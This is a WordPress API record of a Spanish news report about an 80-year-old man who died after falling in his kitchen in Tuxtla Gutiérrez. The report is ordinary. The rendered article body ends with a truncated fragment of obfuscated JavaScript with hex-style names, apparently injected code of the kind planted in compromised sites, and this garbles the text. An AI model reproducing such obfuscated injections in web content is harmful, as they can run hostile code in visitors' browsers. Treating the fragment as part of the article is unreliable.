{"id":16426,"date":"2024-07-01T03:08:13","date_gmt":"2024-07-01T03:08:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16426"},"modified":"2024-07-01T03:08:14","modified_gmt":"2024-07-01T03:08:14","slug":"adulto-mayor-fallece-al-caer-de-su-propia-altura","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16426","title":{"rendered":"Adulto mayor fallece al caer de su propia altura"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16428\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803078223-1024x576.jpg\" alt=\"\" class=\"wp-image-16428\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803078223-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803078223-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803078223-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803078223.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16427\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803080873-1024x576.jpg\" alt=\"\" class=\"wp-image-16427\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803080873-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803080873-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803080873-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719803080873.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 30 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; En un tr\u00e1gico hecho un adulto mayo de 80 a\u00f1os de edad perdi\u00f3 la vida Cuando se encontraba en una vivienda localizada en la 15 Sur y 4a Poniente del Barrio San Francisco de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el abuelito cay\u00f3 de su propia altura, cuando se encontraba en el \u00e1rea de cocina del inmueble.<\/p>\n\n\n\n<p>Testigos del hecho llamaron a los n\u00fameros de emergencias y arribaron param\u00e9dicos de la Cruz Roja Mexicana, quienes tras una revisi\u00f3n determinaron que, el hombre hab\u00eda muerto por un paro card\u00edaco.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado, para realizar las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 30 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; En un tr\u00e1gico hecho un adulto mayo de 80 a\u00f1os de edad perdi\u00f3 la vida Cuando se encontraba en una vivienda localizada en la 15 Sur y 4a Poniente del Barrio San Francisco de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, el abuelito &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16428,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16426","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16426","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16426"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16426\/revisions"}],"predecessor-version":[{"id":16429,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16426\/revisions\/16429"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16428"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16426"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16426"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16426"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}